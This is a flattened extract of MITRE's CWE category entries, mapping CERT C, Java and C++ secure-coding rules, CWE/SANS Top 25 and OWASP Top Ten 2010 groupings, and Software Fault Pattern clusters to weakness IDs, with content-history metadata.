CWE-464 STR03-C Do not inadvertently truncate a null-terminated byte string - CWE-464 STR06-C Do not assume that strtok() leaves the parse string unchanged - CWE-686 STR37-C Arguments to character handling functions must be representable as an unsigned char - CWE-704 STR34-C Cast characters to unsigned types before converting to larger integer sizes - CWE-704 STR37-C Arguments to character handling functions must be representable as an unsigned char - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 07 - Characters and Strings (STR) - CERT C Secure Coding (2008 Version) Section 07 - Characters and Strings (STR) - - - - Weaknesses in this category are related to the rules and recommendations in the Memory Management (MEM) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - - - - - - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-20 MEM10-C Define and use a pointer validation function - CWE-119 MEM09-C Do not assume memory allocation routines initialize memory - CWE-128 MEM07-C Ensure that the arguments to calloc(), when multiplied, can be represented as a size_t - CWE-131 MEM35-C Allocate sufficient memory for an object - CWE-190 MEM07-C Ensure that the arguments to calloc(), when multiplied, can be represented as a size_t - CWE-190 MEM35-C Allocate sufficient memory for an object - CWE-226 MEM03-C Clear sensitive information stored in reusable resources returned for reuse - CWE-244 MEM03-C Clear sensitive information stored in reusable resources returned for reuse - CWE-252 MEM32-C Detect and handle memory allocation errors - CWE-415 MEM00-C Allocate and free memory in the same module, at the same level of abstraction - CWE-415 MEM01-C Store a new value in pointers immediately after free() - CWE-415 MEM31-C Free dynamically allocated memory exactly once - CWE-416 MEM00-C Allocate and free memory in the same module, at the same level of abstraction - CWE-416 MEM01-C Store a new value in pointers immediately after free() - CWE-416 MEM30-C Do not access freed memory - CWE-476 MEM32-C Detect and handle memory allocation errors - CWE-528 MEM06-C Ensure that sensitive data is not written out to disk - CWE-590 MEM34-C Only free memory allocated dynamically - CWE-591 MEM06-C Ensure that sensitive data is not written out to disk - CWE-628 MEM08-C Use realloc() only to resize dynamically allocated arrays - CWE-665 MEM09-C Do not assume memory allocation routines initialize memory - CWE-687 MEM04-C Do not perform zero length allocations - CWE-754 MEM32-C Detect and handle memory allocation errors - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 08 - Memory Management (MEM) - CERT C Secure Coding (2008 Version) Section 08 - Memory Management (MEM) - - - - Weaknesses in this category are related to the rules and recommendations in the Input Output (FIO) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-22 FIO02-C Canonicalize path names originating from untrusted sources - CWE-37 FIO05-C Identify files using multiple file attributes - CWE-38 FIO05-C Identify files using multiple file attributes - CWE-39 FIO05-C Identify files using multiple file attributes - CWE-41 FIO02-C Canonicalize path names originating from untrusted sources - CWE-59 FIO02-C Canonicalize path names originating from untrusted sources - CWE-62 FIO05-C Identify files using multiple file attributes - CWE-64 FIO05-C Identify files using multiple file attributes - CWE-65 FIO05-C Identify files using multiple file attributes - CWE-67 FIO32-C Do not perform operations on devices that are only appropriate for files - CWE-119 FIO37-C Do not assume character data has been read - CWE-134 FIO30-C Exclude user input from format strings - CWE-134 FIO30-C Exclude user input from format strings - CWE-241 FIO37-C Do not assume character data has been read - CWE-276 FIO06-C Create files with appropriate access permissions - CWE-279 FIO06-C Create files with appropriate access permissions - CWE-362 FIO31-C Do not simultaneously open the same file multiple times - CWE-367 FIO01-C Be careful using functions that use file names for identification - CWE-379 FIO15-C Ensure that file operations are performed in a secure directory - CWE-379 FIO43-C Do not create temporary files in shared directories - CWE-391 FIO04-C Detect and handle input and output errors - CWE-391 FIO33-C Detect and handle input output errors resulting in undefined behavior - CWE-403 FIO42-C Ensure files are properly closed when they are no longer needed - CWE-404 FIO42-C Ensure files are properly closed when they are no longer needed - CWE-552 FIO15-C Ensure that file operations are performed in a secure directory - CWE-675 FIO31-C Do not simultaneously open the same file multiple times - CWE-676 FIO01-C Be careful using functions that use file names for identification - CWE-686 FIO00-C Take care when creating format strings - CWE-732 FIO06-C Create files with appropriate access permissions - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 09 - Input Output (FIO) - CERT C Secure Coding (2008 Version) Section 09 - Input Output (FIO) - - - - Weaknesses in this category are related to the rules and recommendations in the Environment (ENV) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-78 ENV03-C Sanitize the environment when invoking external programs - CWE-78 ENV04-C Do not call system() if you do not need a command processor - CWE-88 ENV03-C Sanitize the environment when invoking external programs - CWE-88 ENV04-C Do not call system() if you do not need a command processor - CWE-119 ENV01-C Do not make assumptions about the size of an environment variable - CWE-426 ENV03-C Sanitize the environment when invoking external programs - CWE-462 ENV02-C Beware of multiple environment variables with the same effective name - CWE-705 ENV32-C All atexit handlers must return normally - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 10 - Environment (ENV) - CERT C Secure Coding (2008 Version) Section 10 - Environment (ENV) - - - - Weaknesses in this category are related to the rules and recommendations in the Signals (SIG) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-432 SIG00-C Mask signals handled by noninterruptible signal handlers - CWE-479 SIG30-C Call only asynchronous-safe functions within signal handlers - CWE-479 SIG32-C Do not call longjmp() from inside a signal handler - CWE-479 SIG33-C Do not recursively invoke the raise() function - CWE-479 SIG34-C Do not call signal() from within interruptible signal handlers - CWE-662 SIG00-C Mask signals handled by noninterruptible signal handlers - CWE-662 SIG31-C Do not access or modify shared objects in signal handlers - CWE-828 SIG31-C Do not access or modify shared objects in signal handlers - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 11 - Signals (SIG) - CERT C Secure Coding (2008 Version) Section 11 - Signals (SIG) - - - - Weaknesses in this category are related to the rules and recommendations in the Error Handling (ERR) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-20 ERR07-C Prefer functions that support error checking over equivalent functions that don't - CWE-391 ERR00-C Adopt and implement a consistent and comprehensive error-handling policy - CWE-544 ERR00-C Adopt and implement a consistent and comprehensive error-handling policy - CWE-676 ERR07-C Prefer functions that support error checking over equivalent functions that don't - CWE-705 ERR04-C Choose an appropriate termination strategy - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 12 - Error Handling (ERR) - CERT C Secure Coding (2008 Version) Section 12 - Error Handling (ERR) - - - - Weaknesses in this category are related to the rules and recommendations in the Miscellaneous (MSC) chapter of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-14 MSC06-C Be aware of compiler optimization when dealing with sensitive data - CWE-20 MSC08-C Library functions should validate their parameters - CWE-176 MSC10-C Character Encoding - UTF8 Related Issues - CWE-330 MSC30-C Do not use the rand() function for generating pseudorandom numbers - CWE-480 MSC02-C Avoid errors of omission - CWE-480 MSC03-C Avoid errors of addition - CWE-482 MSC02-C Avoid errors of omission - CWE-561 MSC07-C Detect and remove dead code - CWE-563 MSC00-C Compile cleanly at high warning levels - CWE-570 MSC00-C Compile cleanly at high warning levels - CWE-571 MSC00-C Compile cleanly at high warning levels - CWE-697 MSC31-C Ensure that return values are compared against the proper type - CWE-704 MSC31-C Ensure that return values are compared against the proper type - CWE-758 MSC14-C Do not introduce unnecessary platform dependencies - CWE-758 MSC15-C Do not depend on undefined behavior - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT C Secure Coding Section 49 - Miscellaneous (MSC) - CERT C Secure Coding (2008 Version) Section 49 - Miscellaneous (MSC) - - - - Weaknesses in this category are related to the rules and recommendations in the POSIX (POS) appendix of the CERT C Secure Coding Standard (2008). - - - - - - - - - - - - - - - - - - - In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: - - - CWE-59 POS01-C Check for the existence of links when dealing with files - CWE-170 POS30-C Use the readlink() function properly - CWE-242 POS33-C Do not use vfork() - CWE-272 POS02-C Follow the principle of least privilege - CWE-273 POS37-C Ensure that privilege relinquishment is successful - CWE-363 POS35-C Avoid race conditions while checking for the existence of a symbolic link - CWE-366 POS00-C Avoid race conditions with multiple threads - CWE-562 POS34-C Do not call putenv() with a pointer to an automatic variable as the argument - CWE-667 POS31-C Do not unlock or destroy another thread's mutex - CWE-686 POS34-C Do not call putenv() with a pointer to an automatic variable as the argument - CWE-696 POS36-C Observe correct revocation order while relinquishing privileges - - - - - - - CWE Content Team - MITRE - 2008-11-24 - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References, Relationship_Notes, Relationships - - CERT C Secure Coding Section 50 - POSIX (POS) - CERT C Secure Coding (2008 Version) Section 50 - POSIX (POS) - - - - Weaknesses in this category are listed in the "Insecure Interaction Between Components" section of the 2009 CWE/SANS Top 25 Programming Errors. - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2009-01-12 - - - CWE Content Team - MITRE - 2010-02-16 - updated Name - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - Insecure Interaction Between Components - - - - Weaknesses in this category are listed in the "Risky Resource Management" section of the 2009 CWE/SANS Top 25 Programming Errors. - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2009-01-12 - - - CWE Content Team - MITRE - 2010-02-16 - updated Name - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - Risky Resource Management - - - - Weaknesses in this category are listed in the "Porous Defenses" section of the 2009 CWE/SANS Top 25 Programming Errors. - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2009-01-12 - - - CWE Content Team - MITRE - 2010-02-16 - updated Name, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - Porous Defenses - - - - Weaknesses in this category are listed in the "Insecure Interaction Between Components" section of the 2010 CWE/SANS Top 25 Programming Errors. - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-01-15 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - - - Weaknesses in this category are listed in the "Risky Resource Management" section of the 2010 CWE/SANS Top 25 Programming Errors. - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-01-15 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - - - Weaknesses in this category are listed in the "Porous Defenses" section of the 2010 CWE/SANS Top 25 Programming Errors. - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-01-15 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - - - Weaknesses in this category are not part of the general Top 25, but they were part of the original nominee list from which the Top 25 was drawn. - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-02-12 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - - - Weaknesses in this category are related to the A1 category in the OWASP Top Ten 2010. - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-06-17 - - - - - Weaknesses in this category are related to the A2 category in the OWASP Top Ten 2010. - - - - - - - - - CWE Content Team - MITRE - 2010-06-17 - - - - - Weaknesses in this category are related to the A3 category in the OWASP Top Ten 2010. - - - - - - - - - - - - CWE Content Team - MITRE - 2010-06-17 - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships - - - - - Weaknesses in this category are related to the A4 category in the OWASP Top Ten 2010. - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-06-17 - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - - - Weaknesses in this category are related to the A5 category in the OWASP Top Ten 2010. - - - - - - - - - CWE Content Team - MITRE - 2010-06-17 - - - - - Weaknesses in this category are related to the A6 category in the OWASP Top Ten 2010. - - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-06-17 - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships - - - - - Weaknesses in this category are related to the A7 category in the OWASP Top Ten 2010. - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-06-17 - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships - - - - - Weaknesses in this category are related to the A8 category in the OWASP Top Ten 2010. - - - - - - - - - - - CWE Content Team - MITRE - 2010-06-17 - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships - - - - - Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2010. - - - - - - - - - - CWE Content Team - MITRE - 2010-06-17 - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships - - - - - Weaknesses in this category are related to the A10 category in the OWASP Top Ten 2010. - - - - - - - - - CWE Content Team - MITRE - 2010-06-17 - - - - - Weaknesses in this category identify some of the underlying problems that commonly allow attackers to manipulate the business logic of an application. Errors in business logic can be devastating to an entire application. They can be difficult to find automatically, since they typically involve legitimate use of the application's functionality. However, many business logic errors can exhibit patterns that are similar to well-understood implementation and design weaknesses. - - - - - - - - - - - - - - - - - - - - - - - - - The classification of business logic flaws has been under-studied, although exploitation of business flaws frequently happens in real-world systems, and many applied vulnerability researchers investigate them. The greatest focus is in web applications. There is debate within the community about whether these problems represent particularly new concepts, or if they are variations of well-known principles. - Many business logic flaws appear to be oriented toward business processes, application flows, and sequences of behaviors, which are not as well-represented in CWE as weaknesses related to input validation, memory management, etc. - - - - - CWE Content Team - MITRE - 2011-03-24 - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Description, Observed_Examples, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated References - - - - - Weaknesses in this category are related to rules in the Input Validation and Data Sanitization (IDS) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - CERT Java Secure Coding Section 00 - Input Validation and Data Sanitization (IDS) - - - - Weaknesses in this category are related to rules in the Declarations and Initialization (DCL) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 01 - Declarations and Initialization (DCL) - - - - Weaknesses in this category are related to rules in the Expressions (EXP) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 02 - Expressions (EXP) - - - - Weaknesses in this category are related to rules in the Numeric Types and Operations (NUM) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 03 - Numeric Types and Operations (NUM) - - - - Weaknesses in this category are related to rules in the Object Orientation (OBJ) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 04 - Object Orientation (OBJ) - - - - Weaknesses in this category are related to rules in the Methods (MET) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 05 - Methods (MET) - - - - Weaknesses in this category are related to rules in the Exceptional Behavior (ERR) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 06 - Exceptional Behavior (ERR) - - - - Weaknesses in this category are related to rules in the Visibility and Atomicity (VNA) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 07 - Visibility and Atomicity (VNA) - - - - Weaknesses in this category are related to rules in the Locking (LCK) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 08 - Locking (LCK) - - - - Weaknesses in this category are related to rules in the Thread APIs (THI) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 09 - Thread APIs (THI) - - - - Weaknesses in this category are related to rules in the Thread Pools (TPS) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 10 - Thread Pools (TPS) - - - - Weaknesses in this category are related to rules in the Thread-Safety Miscellaneous (TSM) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 11 - Thread-Safety Miscellaneous (TSM) - - - - Weaknesses in this category are related to rules in the Input Output (FIO) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 12 - Input Output (FIO) - - - - Weaknesses in this category are related to rules in the Serialization (SER) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 13 - Serialization (SER) - - - - Weaknesses in this category are related to rules in the Platform Security (SEC) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 14 - Platform Security (SEC) - - - - Weaknesses in this category are related to rules in the Runtime Environment (ENV) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 15 - Runtime Environment (ENV) - - - - Weaknesses in this category are related to rules in the Miscellaneous (MSC) chapter of The CERT Oracle Secure Coding Standard for Java (2011). - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Description, Name, References - - CERT Java Secure Coding Section 49 - Miscellaneous (MSC) - - - - Weaknesses in this category are listed in the "Insecure Interaction Between Components" section of the 2011 CWE/SANS Top 25 Most Dangerous Software Errors. - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-06-25 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - - - Weaknesses in this category are listed in the "Risky Resource Management" section of the 2011 CWE/SANS Top 25 Most Dangerous Software Errors. - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-06-25 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - - - Weaknesses in this category are listed in the "Porous Defenses" section of the 2011 CWE/SANS Top 25 Most Dangerous Software Errors. - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-06-25 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - - - Weaknesses in this category are not part of the general Top 25, but they were part of the original nominee list from which the Top 25 was drawn. - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-06-25 - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated References - - - - - Weaknesses in this category are related to rules in the Preprocessor (PRE) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - CWE Content Team - MITRE - 2019-01-03 - updated References - - - - - Weaknesses in this category are related to rules in the Declarations and Initialization (DCL) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Expressions (EXP) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Integers (INT) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Floating Point Arithmetic (FLP) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Arrays and the STL (ARR) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Characters and Strings (STR) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Memory Management (MEM) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Input Output (FIO) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Environment (ENV) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Signals (SIG) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Exceptions and Error Handling (ERR) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Object Oriented Programming (OOP) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - - - Weaknesses in this category are related to rules in the Concurrency (CON) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - Weaknesses in this category are related to rules in the Miscellaneous (MSC) section of the CERT C++ Secure Coding Standard. Since not all rules map to specific weaknesses, this category may be incomplete. - - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-08-04 - - - - - This category identifies Software Fault Patterns (SFPs) within the Risky Values cluster (SFP1). - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Risky Values - - - - This category identifies Software Fault Patterns (SFPs) within the Unused entities cluster (SFP2). - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Unused entities - - - - This category identifies Software Fault Patterns (SFPs) within the API cluster (SFP3). - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: API - - - - This category identifies Software Fault Patterns (SFPs) within the Exception Management cluster (SFP4, SFP5, SFP6). - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Exception Management - - - - This category identifies Software Fault Patterns (SFPs) within the Memory Access cluster (SFP7, SFP8). - - - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Memory Access - - - - This category identifies Software Fault Patterns (SFPs) within the Memory Management cluster (SFP38). - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Memory Management - - - - This category identifies Software Fault Patterns (SFPs) within the Resource Management cluster (SFP37). - - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Resource Management - - - - This category identifies Software Fault Patterns (SFPs) within the Path Resolution cluster (SFP16, SFP17, SFP18). - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2013-07-17 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Path Resolution - - - - This category identifies Software Fault Patterns (SFPs) within the Synchronization cluster (SFP19, SFP20, SFP21, SFP22). - - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Synchronization - - - - This category identifies Software Fault Patterns (SFPs) within the Information Leak cluster (SFP23). - - - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP Cluster: Information Leak - - - - This category identifies Software Fault Patterns (SFPs) within the Tainted Input cluster (SFP24, SFP25, SFP26, SFP27). - - - - - - - - - - CWE Content Team - MITRE - 2012-03-22 - - - CWE Content Team - MITRE - 2014-07-30 - updated Name, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description - - SFP 